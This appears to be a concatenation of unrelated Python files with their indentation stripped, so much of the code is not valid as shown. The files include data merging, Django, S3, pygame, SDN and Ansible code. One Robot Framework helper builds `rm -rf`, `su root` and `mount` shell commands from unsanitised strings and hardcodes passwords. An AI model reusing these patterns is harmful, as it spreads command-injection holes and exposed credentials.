epp=pd.merge(ep,phone,how='right',on=['Phone'])
pop=pd.merge(po,phone,how='right',on=['Phone'])
poo=pd.merge(po,order,how='right',on=['OrderId'])
eoe_epe=pd.merge(eoe,epe,how='outer',on=['Email'])
eoo_poo=pd.merge(eoo,poo,how='outer',on=['OrderId'])
epp_pop=pd.merge(epp,pop,how='outer',on=['Phone'])
id1=eoe_epe[[ 'Id_x_x', 'Id_y_x','Id_x_y', 'Id_y_y']]
id2=eoo_poo[[ 'Id_x_x', 'Id_y_x','Id_x_y', 'Id_y_y']]
id3=epp_pop[[ 'Id_x_x', 'Id_y_x','Id_x_y', 'Id_y_y']]
id_df=pd.concat([id1,id2,id3])
def is_missing(col1,col2,col3,col4):
if pd.isnull(col1):
if pd.isnull(col2):
if pd.isnull(col3):
return col4
else :
return col3
else :
return col2
else:
return col1
id_df['Id_x_x']= id_df.apply(lambda x: is_missing(x['Id_x_x'],x['Id_y_x'],x['Id_x_y'],x['Id_y_y']),axis=1)
id_df['Id_x_y']= id_df.apply(lambda x: is_missing(x['Id_x_y'],x['Id_y_x'],x['Id_x_x'],x['Id_y_y']),axis=1)
id_df['Id_y_x']= id_df.apply(lambda x: is_missing(x['Id_y_x'],x['Id_x_x'],x['Id_x_y'],x['Id_y_y']),axis=1)
id_df['Id_y_y']= id_df.apply(lambda x: is_missing(x['Id_y_y'],x['Id_y_x'],x['Id_x_y'],x['Id_x_x']),axis=1)
id1=id_df[['Id_x_x','Id_x_y']]
id2=id_df[['Id_y_x','Id_y_y']]
id1.rename(columns = {'Id_x_x': 'id1', 'Id_x_y': 'id2'}, inplace = True)
id2.rename(columns = {'Id_y_x': 'id1', 'Id_y_y': 'id2'}, inplace = True)
id_final=pd.concat([id1,id2])
import networkx as nx
id_final=list(id_final.to_records(index=False))
G=nx.from_edgelist(id_final)
l=list(nx.connected_components(G))
add_list=[]
for s in l:
li=list(s)
add_list.append(li)
r=pd.Series(add_list)
result=pd.DataFrame(r)
result['list_len']=result[0].apply(lambda x: len(x))
sum(result['list_len'])
contact=data[['Contacts','Id']]
contact=pd.Series(contact.Contacts,index=contact.Id).to_dict()
#get contact sum
def find_dict(x):
summation=0
for n in x:
add=contact[n]
summation=summation+add
return summation
result['contacts']=result[0].apply(lambda x: find_dict(x))
final_dict=dict()
result_list=result[0].to_list()
for li in result_list:
for element in li:
final_dict[element]=li
final_result= pd.DataFrame(list(final_dict.items()),columns = ['ticket_id','col2'])
result.rename(columns = {0: 'col2'}, inplace = True)
def list_to_string(x):
x=sorted(x)
a='-'.join(str(int(i)) for i in x)
return a
result['col3']=result['col2'].apply(lambda x:list_to_string(x))
final_result['col3']=final_result['col2'].apply(lambda x:list_to_string(x))
final=pd.merge(final_result[['ticket_id','col3']],result[['col3','contacts']],on=['col3'])
final['contacts']=final['contacts'].astype(str)
final['col3/contact']=final[['col3','contacts']].agg(', '.join,axis=1)
final.rename(columns = {'col3/contact': 'ticket_trace/contact'}, inplace = True)
final=final.sort_values(by=['ticket_id'])
final['ticket_id']=final['ticket_id'].astype(int)
final[['ticket_id','ticket_trace/contact']].to_csv('result.csv',index=False) |
"""
Definition of models.
"""
from django.db import models
class Place(models.Model):
name = models.CharField(max_length=200, null=True, blank=True)
position = models.CharField(max_length=200, null=True, blank=True)
def __str__(self):
return self.name + " " + self.position |
import logging
from typing import IO, Any, Dict
from urllib.parse import urlparse
_s3_client = None
log = logging.getLogger(__name__)
def get_s3_client() -> Any:
global _s3_client
if not _s3_client:
import boto3
_s3_client = boto3.client("s3")
return _s3_client
def s3_write(
url: str, source_fp: IO[bytes], *, options: Dict[str, Any], dry_run: bool
) -> None:
purl = urlparse(url)
s3_client = get_s3_client()
assert purl.scheme == "s3"
assert not purl.query
acl = options.get("acl")
kwargs = dict(Bucket=purl.netloc, Key=purl.path.lstrip("/"), Body=source_fp)
if acl:
kwargs["ACL"] = acl
if dry_run:
log.info("Dry-run: would write to S3 (ACL %s): %s", acl, url)
return
s3_client.put_object(**kwargs)
log.info("Wrote to S3 (ACL %s): %s", acl, url)
|
#!/usr/bin/env python
import json
import logging
from marquee.formatter import MarqueeFormatter, MarqueeEventFormatter
from marquee.handler import CloudWatchEventsHandler
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
handler = CloudWatchEventsHandler(detail_type='new_type')
log.addHandler(handler)
fmt_log = MarqueeFormatter('theherk.testapp')
handler.setFormatter(fmt_log)
log.info('%s says Hello. This is dog.', 'val')
fmt_event = MarqueeEventFormatter(event_type='theherk.testevent', source='theherk.testapp')
handler.setFormatter(fmt_event)
log.error(
json.dumps(
{
'%s':'jeffrey',
'other':'stuff'
}
), 'user'
)
|
"""pie
answers:
3
2
1
[3,1,4,1,5,9]
[1]
True
False
False
[3,1,4,1,5,9,2,6,5,3]
[4,1,5,9,1]
True
'ten',1,4,1,5,9,1]"""
numbers = [3, 1, 4, 1, 5, 9, 2]
print(numbers[0])
print(numbers[-1])
print(numbers[3])
print(numbers[:-1])
print(numbers[3:4])
print(5 in numbers)
print(7 in numbers)
print("3" in numbers)
print(numbers + [6, 5, 3])
numbers[0] = "ten"
numbers[-1] = 1
print(numbers[2:])
print(9 in numbers)
print(numbers)
|
import array
class ArrayList:
def __init__(self, capacity):
self.capacity = capacity
self.length = 0
self.array = array.array('l', [0]*capacity)
def is_empty(self):
return self.length == 0
def get_capacity(self):
self.capacity *= 2
new_arr = array.array('l', [0]*self.capacity)
for i in range(self.length):
new_arr[i] = self.array[i]
self.array = new_arr
def check_index(self, index):
if index >= self.length or index < 0:
print('Index Error')
return
def prepend(self, value):
if self.length == self.capacity:
self.get_capacity()
for i in range(self.length - 1, -1, -1):
self.array[i + 1] = self.array[i]
self.array[0] = value
self.length += 1
def append(self, value):
if self.length == self.capacity:
self.get_capacity()
self.array[self.length] = value
self.length += 1
def set_head(self, index):
self.check_index(index)
self.array = self.array[index:]
self.capacity -= index
self.length -= index
def access(self, index):
self.check_index(index)
return self.array[index]
def insert(self, index, value):
self.check_index(index)
if self.length == self.capacity:
self.get_capacity()
for i in range(self.length - 1, index - 1, -1):
self.array[i + 1] = self.array[i]
self.array[index] = value
self.length += 1
def remove(self, index):
self.check_index(index)
for i in range(index, self.length - 1):
self.array[i] = self.array[i + 1]
self.length -= 1
def print(self):
if self.is_empty():
print('ArrayList is empty.')
else:
print('ArrayList =>', end=' ')
for i in self.array.tolist()[:self.length]:
print(i, end=' ')
print()
array_list = ArrayList(5)
array_list.print()
for i in range(7):
array_list.prepend(i + 1)
array_list.print()
for i in range(7):
array_list.append(i + 10)
array_list.print()
array_list.set_head(5)
array_list.print()
array_list.insert(5,1000)
array_list.print()
array_list.remove(3)
array_list.print()
print(array_list.access(4)) |
import urllib.request
import time
def get_price():
page= urllib.request.urlopen("https://www.taobao.com")
text=page.read().decode("utf8")
where=text.find('Fact%2F')
start=where+7
end=where+9
return(float(text[start:end]))
price=get_price()
ans=input("do you want the answer instantly: ")
if ans=="y":
print(price)
else:
price=99.9
while price>20:
time.sleep(10)
price=get_price()
print("buy")
|
'''
Created on Jun 24, 2015
@author: rebaca
'''
from robot.api import logger
import pexpect
import re
import os
import subprocess
def create_dirs_under_mount(password, mount_path, start, end):
# Remove existing folders
rmdir_out = subprocess.Popen('rm -rf ' + mount_path + '/{' + start + '..' \
+ end + '}', shell=True, stdout=subprocess.PIPE, \
stderr=subprocess.PIPE)
rmdir_output, rmdir_errors = rmdir_out.communicate()
if 'Permission denied' in rmdir_errors:
user = 'root'
(rmdir_output, exitstatus1) = pexpect.run\
("su " + user + " -c \'rm -rf " + mount_path + "/{" + start + ".." + \
end + "}\'", events={'(?i)password':'' + password + '\n'}, \
withexitstatus=1)
# Create new folders for the provided range
mkdir_out = subprocess.Popen('mkdir -p ' + mount_path + '/{' + start + \
'..' + end + '}/status', shell=True, stdout=subprocess.PIPE, \
stderr=subprocess.PIPE)
mkdir_output, mkdir_errors = mkdir_out.communicate()
if 'Permission denied' in mkdir_errors:
user = 'root'
(mkdir_output, exitstatus2) = pexpect.run\
("su " + user + " -c \'mkdir -p " + mount_path + "/{" + start + ".." \
+ end + "}/status\'", events={'(?i)password':'' + password + '\n'}, \
withexitstatus=1)
def get_os_name(ip_add, password):
cmd_lin = 'uname'
cmd_win = 'ver'
command_output = pexpect.run("ssh rebaca@"+ip_add+" '"+cmd_lin+"'", \
events={'Are you sure you want to continue connecting' + \
' (yes/no)?':'yes' + '\n', '(?i)password':''+password+'\n'}, \
timeout=300)
logger.console("Cmd_op==>%s" % (command_output))
if 'not recognized' in command_output:
command_output = pexpect.run("ssh rebaca@"+ip_add+" '"+cmd_win+"'", \
events={'Are you sure you want to continue connecting' + \
' (yes/no)?':'yes' + '\n', '(?i)password':''+password+'\n'}, \
timeout=300)
logger.console("Cmd_op==>%s" % (command_output))
return command_output
else:
return command_output
def get_os_parameters(ip_add, password):
os_params = {}
os_name = get_os_name(ip_add, password)
if 'Windows' in os_name:
os_params['system_os'] = 'Windows'
os_params['user_id'] = 'rebaca'
os_params['pwd'] = 'rebaca'
elif 'Linux' in os_name:
os_params['system_os'] = 'Linux'
os_params['user_id'] = 'root'
os_params['pwd'] = 'rebaca'
return os_params
def create_mount_directory(ip_add, password, root_path):
ip_trim = str(re.search(r'(\d+\.\d+\.)(\d+\.\d+)', ip_add).group(2))
ip_trim = ip_trim.replace('.', '_')
os_params = get_os_parameters(ip_add, password)
if os_params['system_os'] == 'Linux':
mount_path = '/home/rebaca/Azuki_Framework/linux_mount_' + ip_trim
if os.path.exists(mount_path):
unmount = "su root -c \'umount " + mount_path + "\'"
# logger.console('unmount cmd ==>%s' %(unmount))
unmount_output = pexpect.run(unmount, events={'Password':''+password+'\n'})
# logger.console('unmount_output ==>%s' %(unmount_output))
else:
out = subprocess.Popen('mkdir -p '+mount_path, shell=True)
output, errors = out.communicate()
mount_cmd = "su root -c \'mount " + ip_add + ":" + root_path + " " + mount_path + "\'"
logger.console('command_output ==>%s' % (mount_cmd))
command_output = pexpect.run(mount_cmd, events={'Password':''+password+'\n'})
logger.console('command_output ==>%s' % (command_output))
if 'failed' not in command_output:
logger.console('Linux mount path created successfully')
else:
logger.info('Failed!! Issues while mounting the segmenter output folder')
logger.info(command_output)
return mount_path
elif os_params['system_os'] == 'Windows':
mount_path = '/home/rebaca/Azuki_Framework/windows_mount_' + ip_trim
if os.path.exists(mount_path):
unmount = "su root -c \'umount " + mount_path + "\'"
# logger.console('unmount cmd ==>%s' %(unmount))
print "Running unmount cmd with pexpect"
unmount_output = pexpect.run(unmount, events={'Password':''+password+'\n'})
# logger.console('unmount_output ==>%s' %(unmount_output))
else:
out = subprocess.Popen('mkdir -p '+mount_path, shell=True)
output, errors = out.communicate()
mount_cmd = "su root -c \'mount " + ip_add + ":" + root_path + " " + mount_path + "\'"
#logger.console('command_output ==>%s' % (mount_cmd))
command_output = pexpect.run(mount_cmd, events={'Password':''+password+'\n'})
#logger.console('command_output ==>%s' % (command_output))
if 'failed' not in command_output:
logger.console('Windows mount path created successfully')
else:
logger.info('Failed!! Issues while mounting the segmenter output folder')
logger.info(command_output)
return mount_path
|
def function(reverse_list):
i=0
reverse_list.reverse()
print((reverse_list))
reverse_list = [6, 8, 4, 3, 9, 56, 0, 34, 7, 15]
function(reverse_list) |
#from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/drive'
CLIENT_SECRET_FILE = 'api/client_secret.json'
APPLICATION_NAME = 'MUMT-IT'
def get_credentials():
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir, 'drive-python-readonly.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else:
credentials = tools.run(flow, store)
print('Storing credentials to' + credential_path)
return credentials
def get_credentials_from_file():
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir, 'drive-python-readonly.json')
store = Storage(credential_path)
credentials = store.get()
return credentials
def get_file_list(folder_id, credentials):
http = credentials.authorize(httplib2.Http())
service = discovery.build('drive', 'v3', http=http)
results = service.files().list(
pageSize=10,
q="'%s' in parents" % str(folder_id),
fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
if not items:
return []
else:
files = []
for item in items:
files.append({'id': item['id'], 'name': item['name']})
#print('{0} ({1})'.format(item['name'], item['id']))
return files
if __name__=='__main__':
credentials = get_credentials()
print(credentials.to_json()) |
from django.contrib import admin
from django.db import models
from .models import Topic, Course, Student, Order
class CourseAdmin(admin.ModelAdmin):
# list to display the fields of Course model
list_display = ['name', 'topic', 'price', 'hours', 'for_everyone']
actions = ['add_50_to_hours']
# action for CourseAdmin to add hours of selected course by 50
def add_50_to_hours(self, request, queryset):
for obj in queryset:
added_hours = obj.hours + 50
queryset.update(hours=added_hours)
add_50_to_hours.short_description = "Add 50 to hours"
class StudentAdmin(admin.ModelAdmin):
# list to display the fields of Course model
list_display = ['upper_case_name', 'city']
def upper_case_name(self, obj):
return ("%s %s" % (obj.first_name, obj.last_name)).upper()
upper_case_name.short_description = 'Full Name'
# Register your models here.
admin.site.register(Topic)
admin.site.register(Course, CourseAdmin)
admin.site.register(Student, StudentAdmin)
admin.site.register(Order)
|
# while True:
# name= input("Nhap vao ten: ")
# if name.isalpha() == True:
# break
# while True:
# name= input("nhap ten: ")
# if name.isalpha() == False:
# break
# while True:
# name= input("nhap ten: ")
# if name.isalpha() == False:
# break
# ask = input("enter your number: ")
# print("the number your has",len(ask),"digits")
# import pyglet
# music = pyglet.resource.media('viDu.mp3')
# music.play()
# pyglet.app.run()
# for i in range(3,12,2):
# print(i,end=' ')
|
import pygame
import random
import json
from classes.classes import *
RES = (700, 600)
PASS_HEIGHT = 180
WALL_SPEED = 5
WALL_WIDTH = 60
WALL_HEIGHT = 60
FPS = 60
# non-main functions --- #
def generate_new_blocks(color:list, x_offset: int = 0, block_count: int=3) -> list:
blocks = []
total_height = 0
gap = random.randint(-WALL_HEIGHT, PASS_HEIGHT)
for _ in range(block_count):
rect = pygame.Rect(RES[0]+x_offset, gap + total_height, WALL_WIDTH, WALL_HEIGHT)
total_height += gap + WALL_HEIGHT
gap = random.randint(PASS_HEIGHT-50, PASS_HEIGHT+50)
blocks.append(Wall(rect, color))
return blocks
def generate_new_shop_list():
l = []
for i, item in enumerate(shop_data):
new_btn = DrawingButton(pygame.Rect((RES[0]-210)/2+50, (RES[1]-210)/2 + 300*i, 210, 210))
new_btn.add_drawing('rect', [15,15,15], pygame.Rect(0, 0, 210, 210))
if item[0]:
new_btn.add_drawing('rect', item[1][0], pygame.Rect(6, 6, 66, 198))
new_btn.add_drawing('rect', item[1][1], pygame.Rect(72, 6, 66, 198))
new_btn.add_drawing('rect', item[1][2], pygame.Rect(138, 6, 66, 198))
else:
new_btn.add_drawing('rect', [200, 200, 200], pygame.Rect(105-20, 105-30, 40, 30))
new_btn.add_drawing('rect', [15, 15, 15], pygame.Rect(105-10, 105-20, 20, 25))
new_btn.add_drawing('rect', [200, 200, 200], pygame.Rect(105-30, 105, 60, 35))
price_txt = Text(
'fonts/Signika.ttf', 50, [0, 0],
str(item[2])+" Coins" if (item[2] != 0 or not item[0]) else "",
colors[(color_abs_id+2) % 3],
True
)
price_txt.set_pos_to_center(RES, [-200, new_btn.rect[1]-195])
l.append([new_btn, price_txt])
return l
# pygame stuff --- #
pygame.init()
display = pygame.display.set_mode(RES)
clock = pygame.time.Clock()
pygame.display.set_caption("Triplebox!")
icon = pygame.image.load('imgs/icon.png').convert_alpha()
pygame.display.set_icon(icon)
# loading stuff --- #
with open('data/data.json', 'r') as f:
all_data = json.load(f)
data = all_data['data']
shop_data = all_data['shop']
# variables --- #
score = 0
color_abs_id = 0
text_fade_in_factor = 150
main_run = True
game_over = False
walls = []
btn_list = []
shop_list = []
colors = shop_data[0][1]
init_txt_color = [x-15 for x in colors[(color_abs_id+2) % 3]]
scene_id = 0
next_scene_id = 0
'''
0 = main game loop
1 = shop
'''
# custom objects --- #
score_txt = Text('fonts/Signika.ttf', 400, [0, 0], str(score), init_txt_color, True)
score_txt.set_pos_to_center(RES, [0, -10])
hiscore_txt = Text(
'fonts/Signika.ttf', 48, [0, 0],
"Highscore: "+str(data['hiscore']),
init_txt_color, True
)
hiscore_txt.set_pos_to_center(RES, [0, 160])
shop_button_txt = Text('fonts/Signika.ttf', 72, [0, 0], 'S', init_txt_color, True)
money_txt = Text(
'fonts/Signika.ttf', 48, [0, 0],
str(data['money'])+" Coins",
init_txt_color, True
)
money_txt.set_pos_to_center(RES, [0, -180])
player = Player(
pygame.Rect(-50, RES[1]//2-25, 50, 50),
colors[color_abs_id % 3]
)
# filling lists --- #
btn_list.append(TextButton(
pygame.Rect(RES[0]-106, 10, 96, 96),
colors[(color_abs_id+2) % 3],
[x-7 for x in colors[(color_abs_id+2) % 3]],
shop_button_txt
))
walls.extend(
generate_new_blocks(colors[(color_abs_id+1) % 3])
+ generate_new_blocks(colors[(color_abs_id+1) % 3],
(RES[0] + WALL_WIDTH)//2)
)
shop_list = generate_new_shop_list()
# deleting unneeded variables --- #
del init_txt_color
del icon
# main functions --- #
def events():
""" All pygame.event and keyboard stuff here. """
global main_run, game_over, next_scene_id, colors, shop_list
mouse_pos = pygame.mouse.get_pos()
for event in pygame.event.get():
if event.type == pygame.QUIT:
main_run = False
elif event.type == pygame.KEYDOWN:
if scene_id == 0:
if event.key == pygame.K_SPACE and not game_over:
player.jump()
elif event.type == pygame.MOUSEBUTTONDOWN:
for b in btn_list:
if b.is_over(mouse_pos):
b.pressed = True
elif event.type == pygame.MOUSEBUTTONUP:
if btn_list[0].pressed: # shop button
btn_list[0].pressed = False
if scene_id == 0:
game_over = True
next_scene_id = 1
else:
next_scene_id = 0
game_over = True
with open('data/data.json', 'w') as f:
json.dump(all_data, f)
if scene_id == 1:
for i, b in enumerate(shop_list):
if b[0].is_over(mouse_pos):
if shop_data[i][0]:
colors = shop_data[i][1]
for btn in btn_list:
btn.set_colors(
colors[(color_abs_id+2) % 3],
[x-7 for x in colors[(color_abs_id+2) % 3]],
[x-15 for x in colors[(color_abs_id+2) % 3]]
)
break
if shop_data[i][2] <= data['money']:
shop_data[i][0] = True
data['money'] -= shop_data[i][2]
money_txt.set_value(str(data['money'])+" Coins")
money_txt.set_pos([30,30])
b[0].drawings = []
b[0].add_drawing('rect', [15,15,15], pygame.Rect(0, 0, 210, 210))
b[0].add_drawing('rect', shop_data[i][1][0], pygame.Rect(6, 6, 66, 198))
b[0].add_drawing('rect', shop_data[i][1][1], pygame.Rect(72, 6, 66, 198))
b[0].add_drawing('rect', shop_data[i][1][2], pygame.Rect(138, 6, 66, 198))
break
keys = pygame.key.get_pressed()
if scene_id == 1:
if keys[pygame.K_DOWN] and shop_list[-1][0].rect[1] + shop_list[-1][0].rect[3] > RES[1]/2:
for i in shop_list:
i[0].rect[1] -= 10
i[1].set_pos_to_center(RES, [-200, i[0].rect[1]-195])
elif keys[pygame.K_UP] and shop_list[0][0].rect[1] < RES[1]/2:
for i in shop_list:
i[0].rect[1] += 10
i[1].set_pos_to_center(RES, [-200, i[0].rect[1]-195])
for b in btn_list:
if b.is_over(mouse_pos) and b.text_shade > -20:
b.modify_text_shade(-1)
elif b.text_shade < 0:
b.modify_text_shade(1)
def update():
""" All updating related stuff here. """
global walls, game_over, player, color_abs_id, score, text_fade_in_factor, scene_id
if game_over:
player.rect.width *= 1.04
player.rect.height *= 1.04
player.rect.x -= 0.02*player.rect.width
player.rect.y -= 0.02*player.rect.height
player.surface = pygame.transform.scale(
player.surface,
player.rect[2:4]
)
if (player.rect.width > 2.5*RES[0] and player.rect.height > 2.5*RES[1]) or scene_id != 0:
with open('data/data.json', 'w') as f:
json.dump(all_data, f)
game_over = False
score = 0
text_fade_in_factor = 150
walls = []
if scene_id == 0:
color_abs_id += 1
score_txt.set_value(str(score), update=False)
score_txt.set_pos_to_center(RES, [0, -10])
player = Player(
pygame.Rect(-50, RES[1]//2-25, 50, 50),
colors[color_abs_id % 3]
)
walls.extend(
generate_new_blocks(colors[(color_abs_id+1) % 3])
+ generate_new_blocks(colors[(color_abs_id+1) % 3],
(RES[0] + WALL_WIDTH)//2)
)
score_txt.set_color(colors[(color_abs_id+2) % 3])
hiscore_txt.set_color(colors[(color_abs_id+2) % 3])
money_txt.set_color(colors[(color_abs_id+2) % 3])
for i in shop_list:
i[1].set_color([x-15 for x in colors[(color_abs_id+2) % 3]])
for btn in btn_list:
btn.set_colors(
colors[(color_abs_id+2) % 3],
[x-7 for x in colors[(color_abs_id+2) % 3]],
[x-15 for x in colors[(color_abs_id+2) % 3]]
)
scene_id = next_scene_id
if scene_id == 0:
money_txt.set_pos_to_center(RES, [0, -180])
elif scene_id == 1:
money_txt.set_pos([30,30])
return
if text_fade_in_factor != 1:
c = [round(x-15+(text_fade_in_factor/10)) for x in colors[(color_abs_id+2) % 3]]
score_txt.set_color(c)
hiscore_txt.set_color(c)
money_txt.set_color(c)
text_fade_in_factor -= 1
if scene_id != 0:
return
player.rect.x += player.x_anim_entry
player.x_anim_entry *= 0.96
player.apply_gravity()
if abs(player.gravity) < 70:
player.update_gravity()
for i, w in enumerate(walls):
w.rect.x -= WALL_SPEED
if player.rect.colliderect(w.rect) or player.rect.y < 0 or player.rect.y + player.rect.height > RES[1]:
game_over = True
break
if w.rect.x < -WALL_WIDTH:
walls = walls[3:]
break
if len(walls) < 6:
walls.extend(generate_new_blocks(colors[(color_abs_id+1) % 3]))
score += 1
data['money'] += 1
score_txt.set_value(str(score))
score_txt.set_pos_to_center(RES, [0, -10])
money_txt.set_value(str(data['money'])+" Coins")
money_txt.set_pos_to_center(RES, [0, -180])
if score > data['hiscore']:
data['hiscore'] = score
hiscore_txt.set_value("Highscore: "+str(data['hiscore']))
hiscore_txt.set_pos_to_center(RES, [0, 160])
def render(display: object):
""" All rendering related stuff here. """
ticks = pygame.time.get_ticks()
display.fill(colors[(color_abs_id+2) % 3])
for b in btn_list:
b.render(display)
if scene_id == 0: # main game loop
score_txt.render(display)
hiscore_txt.render(display)
money_txt.render(display)
for w in walls:
w.render(display)
player.render(display)
elif scene_id == 1:
for i in shop_list:
i[0].render(display)
i[1].render(display)
pygame.draw.rect(display, colors[(color_abs_id+2) % 3], [0, 0, 295, 130])
money_txt.render(display)
pygame.display.update()
# mainloop --- #
while main_run:
clock.tick(FPS)
events()
update()
render(display)
pygame.quit()
|
from pox.core import core
from pox.lib.util import dpid_to_str
import pox.openflow.libopenflow_01 as of
import pox.lib.packet as pkt
from extensions.flow import Flow
from pox.lib.packet.ipv4 import ipv4
from pox.lib.packet.udp import udp
from pox.lib.packet.tcp import tcp
log = core.getLogger()
class SwitchController:
def __init__(self, dpid, connection, controller):
self.dpid = dpid_to_str(dpid)
self.connection = connection
# El SwitchController se agrega como handler de los eventos del switch
self.connection.addListeners(self)
self.network_controller = controller
self.neighbour = {} # switch_vecino: puerto para llegar
def _handle_PacketIn(self, event):
"""
Esta funcion es llamada cada vez que el switch recibe un paquete
y no encuentra en su tabla una regla para rutearlo
"""
packet = event.parsed
src_port = None
dst_port = None
ip = None
if isinstance(packet.next, ipv4):
ip = packet.next
if isinstance(ip.next, tcp) or isinstance(ip.next, udp):
src_port = ip.next.srcport
dst_port = ip.next.dstport
# Si el paquete es IPv4
if ip:
log.debug("[%s puerto %s] %s (%s) -> %s (%s)", dpid_to_str(event.dpid), event.port, ip.srcip, str(packet.src),
ip.dstip, str(packet.dst))
# Identifico el Flow en base a IPs, Puertos y Protocolo
flow = Flow(ip.srcip, src_port, ip.dstip, dst_port, ip.protocol, packet.src, packet.dst)
if self.network_controller.validate_and_install(flow):
log.debug("No match: (%s) %s:%s --> (%s) %s:%s proto:%s, switch:%s", str(packet.src), str(ip.srcip),\
str(src_port),str(packet.dst), str(ip.dstip), str(dst_port), str(ip.protocol), str(self.dpid))
# Reenvio el paquete que genero el packetIn sacandolo por el puerto que matchea con la nueva regla
msg = of.ofp_packet_out()
msg.data = event.ofp
msg.actions.append(of.ofp_action_output(port=of.OFPP_TABLE))
self.connection.send(msg)
else:
log.debug("Ignorando [%s puerto %s] (%s) -> (%s)", dpid_to_str(event.dpid), event.port, str(packet.src),
str(packet.dst))
def update(self, flow, next_hop, ip_routing=True):
msg = of.ofp_flow_mod(flags=of.OFPFF_SEND_FLOW_REM)
if not ip_routing:
# Aplico Routing a nivel L2, solamente considerando mac addresses
# Esto no me permite implementar ECMP porque siempre van a ir de un src a un dst
# por el mismo lugar
msg.match.dl_src = flow.src_hw
msg.match.dl_dst = flow.dst_hw
else:
log.debug("Protocol: %s" % str(flow.protocol))
msg.match.dl_type = pkt.ethernet.IP_TYPE
msg.match.nw_dst = flow.dst_ip
msg.match.nw_src = flow.src_ip
msg.match.nw_proto = flow.protocol
if (flow.protocol == pkt.ipv4.TCP_PROTOCOL) or (flow.protocol == pkt.ipv4.UDP_PROTOCOL):
msg.match.tp_dst = flow.dst_port
msg.match.tp_src = flow.src_port
if next_hop in self.neighbour:
port = self.neighbour[next_hop]
log.debug("update", self.dpid, port)
else:
port = self.network_controller.get_hosts()[str(flow.dst_hw)]
log.debug("forward", self.dpid)
msg.actions.append(of.ofp_action_output(port=port))
self.connection.send(msg)
def addLinkTo(self, dst_sw, src_port):
self.neighbour[dst_sw] = src_port
def removeLinkTo(self, dst_sw):
self.removeRuleByPort(self.neighbour[dst_sw])
del self.neighbour[dst_sw]
def removeRuleByPort(self, port):
msg = of.ofp_flow_mod(command=of.OFPFC_DELETE)
log.info("Elimino regla en switch %s por puerto %d" % (self.dpid, port,))
msg.out_port = port
self.connection.send(msg)
def removeRuleByFlow(self, flow):
log.debug("Elimino flow %s " % str(flow))
msg = of.ofp_flow_mod(command=of.OFPFC_DELETE)
msg.match = flow.match
self.connection.send(msg)
|
#Copyright: (c) 2019, kristin barkardottir
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# simple bool to verify base64 string
#!/usr/bin/python
from ansible.module_utils.basic import *
import base64
import binascii
def base_64_string_verify(data):
b64 = data['base64string']
try:
base64.decodestring(b64)
except binascii.Error:
return True, True, {"status": "FAILED"}
return False, False, {"status": "SUCCESS" }
def main():
fields = {
"base64string" : {
"required": True ,
"type": "str"
},
"convert": {
"required": False ,
"type" : "bool"
},
}
module = AnsibleModule(argument_spec=fields)
is_error, has_changed, result = base_64_string_verify(module.params)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error string is not base64", meta=result)
if __name__ == '__main__':
main()
|
from __future__ import absolute_import
import mxnet as mx
import mxnet.symbol as sym
import json
from analysis.layers import *
import re
import ctypes
from mxnet.ndarray import NDArray
import mxnet.ndarray as nd
from mxnet.base import NDArrayHandle, py_str
blob_dict = []
tracked_layers = []
def tmpnet():
x = sym.Variable('data')
y = sym.Convolution(x, kernel=(3, 3), num_filter=32)
y = sym.Activation(y, 'relu')
y = sym.Convolution(y, kernel=(3, 3), num_filter=64, stride=(2, 2), num_group=2)
y = sym.softmax(y)
return y
def analyse(data_infos, module_json, data_name='data'):
datas = {}
for info in data_infos:
datas[info[1]] = info[2]
nodes = json.loads(module_json)['nodes']
input = []
out = None
for node in nodes:
name = node['name']
bottoms = [str(nodes[i[0]]['name']) for i in node['inputs']]
for i, bottom in enumerate(bottoms):
if bottom + '_output' in datas:
bottoms[i] = datas[bottom + '_output']
elif bottom + '_0' in datas:
bottoms[i] = datas[bottom + '_0']
elif bottom in datas:
bottoms[i] = datas[bottom]
else:
cur_node = node
while True:
bottom = [str(nodes[inp[0]]['name']) for inp in cur_node['inputs']][0]
if bottom + '_output' in datas:
bottoms[i] = datas[bottom + '_output']
break
elif bottom + '_0' in datas:
bottoms[i] = datas[bottom + '_0']
break
elif bottom in datas:
bottoms[i] = datas[bottom]
break
try:
bottom_node = nodes[cur_node['inputs'][0][0]]
except:
pass
cur_node = bottom_node
if data_name == name:
input.append(Blob(datas[data_name]))
elif node['op'] == 'Convolution':
kernel = eval(node['attrs']['kernel'])
num_out = eval(node['attrs']['num_filter'])
group_size = eval(node['attrs'].get('num_group', '1'))
pad = eval(node['attrs'].get('pad', '(0,0)'))
stride = eval(node['attrs'].get('stride', '(1,1)'))
x = Blob(bottoms[0])
out = Conv(x, kernel_size=kernel, stride=stride, pad=pad,
num_out=num_out, group_size=group_size, name=name)
tracked_layers.append(out)
elif node['op'] == 'BatchNorm':
x = Blob(bottoms[0])
out = Norm(x, 'batch_norm', name=name)
tracked_layers.append(out)
elif node['op'] == 'FullyConnected':
x = Blob(bottoms[0])
num_hidden = eval(node['attrs']['num_hidden'])
out = Fc(x, num_hidden, name=name)
tracked_layers.append(out)
elif node['op'] == 'Activation':
pass
elif 'elemwise' in node['op']:
pass
class Monitor(object):
def __init__(self, interval=1, pattern='.*', sort=False):
def stat(x):
return x.shape
self.stat_func = stat
self.interval = interval
self.activated = False
self.queue = []
self.step = 0
self.exes = []
self.re_prog = re.compile(pattern)
self.sort = sort
def stat_helper(name, array):
array = ctypes.cast(array, NDArrayHandle)
array = NDArray(array, writable=False)
if not self.activated or not self.re_prog.match(py_str(name)):
return
self.queue.append((self.step, py_str(name), stat(array)))
